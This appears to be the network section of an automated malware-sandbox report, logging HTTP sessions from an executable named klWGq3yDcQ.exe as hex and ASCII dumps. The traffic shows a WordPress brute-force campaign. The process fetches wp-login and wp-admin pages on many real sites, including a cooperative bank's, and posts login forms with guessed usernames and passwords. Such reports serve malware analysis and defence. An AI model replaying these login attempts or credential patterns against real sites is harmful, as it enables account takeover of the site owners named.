                                                                                                                                                                                                    Host: beachrecruitment.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: k8spersistent=1203cc93bf326997096bfdc5c2cf4d3f|11f187638643e13d7bd1963991fac52b; OF=t7tpj990pro70mtqoib6d9bpg5
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:01 UTC421INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 31 20 47 4d 54 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 30 0d 0a 65 78 70 69 72 65 73 3a 20 54 68 75 2c 20 31 39 20 4e 6f 76 20 31 39 38 31 20 30 38 3a 35 32 3a 30 30 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 70 72 61 67 6d 61 3a 20
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved Permanentlydate: Sun, 26 Nov 2023 06:00:01 GMTcontent-type: text/html; charset=utf-8content-length: 0expires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0pragma:


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    584192.168.2.456642213.0.13.444436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:01 UTC395OUTPOST /wp/wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: www.ceuandalucia.es
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: wordpress_test_cookie=WP+Cookie+check; wordpress_test_cookie=WP+Cookie+check
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://www.ceuandalucia.es/wp/wp-login.php
                                                                                                                                                                                                    Content-Length: 144
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    2023-11-26 06:00:01 UTC144OUTData Raw: 6c 6f 67 3d 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 26 70 77 64 3d 68 6f 6c 61 61 61 61 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 41 63 63 65 64 65 72 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 65 75 61 6e 64 61 6c 75 63 69 61 2e 65 73 25 32 46 77 70 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31
                                                                                                                                                                                                    Data Ascii: log=administrator&pwd=holaaaa&rememberme=forever&wp-submit=Acceder&redirect_to=https%3A%2F%2Fwww.ceuandalucia.es%2Fwp%2Fwp-admin%2F&testcookie=1
                                                                                                                                                                                                    2023-11-26 06:00:02 UTC542INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 31 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 35 2e 34 2e 34 35 2d 30 2b 64 65 62 37 75 31 34 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 74 65 73 74 5f 63 6f 6f 6b 69 65 3d 57 50 2b 43 6f 6f 6b 69 65 2b 63 68 65 63 6b 3b 20 70 61 74 68 3d
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 06:00:01 GMTServer: ApacheX-Powered-By: PHP/5.4.45-0+deb7u14Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=
                                                                                                                                                                                                    2023-11-26 06:00:02 UTC7437INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 0a 09 09 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 69 65 38 22 20 6c 61 6e 67 3d 22 65 73 22 20 78 6d 6c 6e 73 3a 6f 67 3d 22 68 74 74 70 3a 2f 2f 6f 70 65 6e 67 72 61 70 68 70 72 6f 74 6f 63 6f 6c 2e 6f 72 67 2f 73 63 68 65 6d 61 2f 22 20 78 6d 6c 6e 73 3a 66 62 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 32 30 30 38 2f 66 62 6d 6c 22 3e 0a 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 38 29 20 5d 3e 3c 21 2d 2d 3e 0a 09 09 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>...[if IE 8]><html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="es" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"><![endif]-->...[if !(IE 8) ]>...><html xmlns="http://w


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    585192.168.2.45671274.220.219.1894436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:01 UTC244OUTGET /wp-login.php?redirect_to=https%3A%2F%2Fhimontessori.com%2Fwp-admin%2F&reauth=1 HTTP/1.1
                                                                                                                                                                                                    Host: himontessori.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:02 UTC162INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 39 20 43 6f 6e 66 6c 69 63 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 32 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 38 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 409 ConflictDate: Sun, 26 Nov 2023 06:00:02 GMTServer: ApacheContent-Length: 83Connection: closeContent-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    2023-11-26 06:00:02 UTC83INData Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e
                                                                                                                                                                                                    Data Ascii: <script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    586192.168.2.456501164.52.221.514436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:01 UTC336OUTPOST /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: gccb.co.in
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: wordpress_test_cookie=WP%20Cookie%20check
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://gccb.co.in/wp-login.php
                                                                                                                                                                                                    Content-Length: 138
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    2023-11-26 06:00:01 UTC138OUTData Raw: 6c 6f 67 3d 69 6e 66 6f 25 34 30 67 63 63 62 2e 63 6f 2e 69 6e 26 70 77 64 3d 69 6e 66 6f 67 63 63 62 63 6f 69 6e 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 67 63 63 62 2e 63 6f 2e 69 6e 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31
                                                                                                                                                                                                    Data Ascii: log=info%40gccb.co.in&pwd=infogccbcoin&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Fgccb.co.in%2Fwp-admin%2F&testcookie=1
                                                                                                                                                                                                    2023-11-26 06:00:03 UTC412INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 32 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 38 2e 30 2e 32 30 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 74 65 73 74 5f 63 6f 6f 6b 69 65 3d 57 50 25
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 06:00:02 GMTServer: ApacheX-Powered-By: PHP/8.0.20Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Frame-Options: SAMEORIGINSet-Cookie: wordpress_test_cookie=WP%
                                                                                                                                                                                                    2023-11-26 06:00:03 UTC6589INData Raw: 31 39 62 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 54 68 65 20 47 6f 64 68 72 61 20 43 69 74 79 20 43 6f 2d 6f 70 20 42 61 6e 6b 20 4c 74 64 2e 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72
                                                                                                                                                                                                    Data Ascii: 19b5<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; The Godhra City Co-op Bank Ltd. &#8212; WordPress</title><meta name='robots' content='max-image-preview:lar
                                                                                                                                                                                                    2023-11-26 06:00:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    587192.168.2.45674666.235.200.1474436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:01 UTC331OUTGET /wp-login.php?redirect_to=https%3A%2F%2Ftradeavenida.com%2Fwp-admin%2F&reauth=1 HTTP/1.1
                                                                                                                                                                                                    Host: tradeavenida.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: _cfuvid=hY8Vy7VtT12kDq0RfaLK5NeJRfcW.qBPudtlDQAWA4k-1700978399347-0-604800000
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:02 UTC227INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 39 20 43 6f 6e 66 6c 69 63 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 4d 49 53 53 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 32 62 66 65 38 61 34 62 63 33 30 35 38 63 30 2d 49 41 44 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 409 ConflictDate: Sun, 26 Nov 2023 06:00:02 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: MISSServer: cloudflareCF-RAY: 82bfe8a4bc3058c0-IAD
                                                                                                                                                                                                    2023-11-26 06:00:02 UTC89INData Raw: 35 33 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: 53<script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>
                                                                                                                                                                                                    2023-11-26 06:00:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    588192.168.2.456643120.88.73.2384436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:01 UTC252OUTGET /saml/index.php?page=%2Fwp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: my.calvary.qld.edu.au
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: PHPSESSID=0pfpv6fic6tscei8l2krgncvto
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:02 UTC1088INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 78 70 69 72 65 73 3a 20 54 68 75 2c 20 31 39 20 4e 6f 76 20 31 39 38 31 20 30 38 3a 35 32 3a 30 30 20 47 4d 54 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundServer: nginxDate: Sun, 26 Nov 2023 06:00:02 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Thu, 19 Nov 1981 08:52:00 GMTPragma: no-cacheCache-Control: no-cache, must-revalida
                                                                                                                                                                                                    2023-11-26 06:00:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    589192.168.2.456784194.47.252.1154436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:02 UTC249OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: www.maxiv.lu.se
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: ff59ae34f86788aafc83adbd6fbb16ab=573a080441b430e46540f849b8105044
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:02 UTC98INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 30 0d 0a 6c 6f 63 61 74 69 6f 6e 3a 20 2f 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 63 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 Foundcontent-length: 0location: /cache-control: no-cacheconnection: close


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    590192.168.2.45680195.168.220.2104436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:02 UTC219OUTGET /admin/ HTTP/1.1
                                                                                                                                                                                                    Host: www.beachrecruitment.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: OF=t7tpj990pro70mtqoib6d9bpg5
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:02 UTC535INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 32 20 47 4d 54 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 74 72 61 6e 73 66 65 72 2d 65 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 6b 38 73 70 65 72 73 69 73 74 65 6e 74 3d 34 66 33 36 61 63 36 34 64 63 37 33 63 32 36 61 64 66 61 62 39 64 61 64 30 31 37 38 38 62 33 38 7c 31 31 66 31 38 37 36 33 38 36 34 33 65 31 33 64 37 62 64 31 39 36 33 39 39 31 66 61 63 35 32 62 3b 20 45 78 70 69 72 65 73 3d 54 75 65 2c 20 32 38 2d 4e 6f 76 2d 32 33 20 30 36 3a 30 30 3a 30 32 20 47
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not Founddate: Sun, 26 Nov 2023 06:00:02 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedset-cookie: k8spersistent=4f36ac64dc73c26adfab9dad01788b38|11f187638643e13d7bd1963991fac52b; Expires=Tue, 28-Nov-23 06:00:02 G
                                                                                                                                                                                                    2023-11-26 06:00:02 UTC9214INData Raw: 32 33 46 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6e 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 42 65 61 63 68 20 52 65 63 72 75 69 74 6d 65 6e 74 20 42 2e 56 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 63 72 69 70 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 4a 61 76 61 73 63 72 69 70 74 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 74 79 6c 65 2d 54 79 70 65 22 20
                                                                                                                                                                                                    Data Ascii: 23F6<!DOCTYPE html><html lang="nl"><head><title>Beach Recruitment B.V.</title><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><meta http-equiv="Content-Script-Type" content="text/Javascript"><meta http-equiv="Content-Style-Type"
                                                                                                                                                                                                    2023-11-26 06:00:03 UTC16384INData Raw: 34 34 41 44 0d 0a 63 61 74 2f 61 6c 6c 22 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 3c 53 54 52 49 4b 45 3e 42 65 6b 69 6a 6b 20 61 6c 6c 65 20 76 61 63 61 74 75 72 65 73 3c 2f 53 54 52 49 4b 45 3e 3c 2f 41 3e 3c 2f 50 3e 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 21 2d 2d 4c 49 4e 4b 53 2d 2d 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 49 74 65 6d 43 6f 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 46 6f 74 6f 22 3e 0a 09 09 09 09 09 3c 69 6d 67 20 73 74 79 6c 65 3d 22 22 20 61 6c 74 3d 22 22 20 74 69 74 6c 65 3d 22 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 38 35 30 22 20 73
                                                                                                                                                                                                    Data Ascii: 44ADcat/all" target="_self"><STRIKE>Bekijk alle vacatures</STRIKE></A></P></div></div></div>...LINKS--></div><div class="tItemCon"><div class="tFoto"><img style="" alt="" title="" width="1920" height="850" s
                                                                                                                                                                                                    2023-11-26 06:00:03 UTC1205INData Raw: 30 35 30 32 38 38 22 20 74 61 72 67 65 74 3d 5f 62 6c 61 6e 6b 3e 30 32 33 2d 32 30 35 30 32 38 38 3c 2f 41 3e 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 6e 65 72 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 21 2d 2d 4c 49 4e 4b 53 2d 2d 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 0a 09 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 66 6f 6f 74 65 72 3e 0a 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 73 36 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 77 22 3e 0a 20 20 20 20 20 20 20 20 3c 62 3e 43 6f 70 79 72 69 67 68 74 20 26 63 6f 70 79 3b 20 32 30 32 33 3c 2f 62 3e 20 42 45 41 43 48 20 52 65 63 72 75 69 74 6d 65 6e 74 20 42 2e 56 2e 0a
                                                                                                                                                                                                    Data Ascii: 050288" target=_blank>023-2050288</A></div><div class="cleaner"></div>...LINKS--></div></div></li> </ul> </div></footer><section id="s6"> <div class="sw"> <b>Copyright &copy; 2023</b> BEACH Recruitment B.V.
                                                                                                                                                                                                    2023-11-26 06:00:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                    591192.168.2.45680218.229.0.171443
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:02 UTC210OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: rechagricola.com.br
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://www.rech.com/
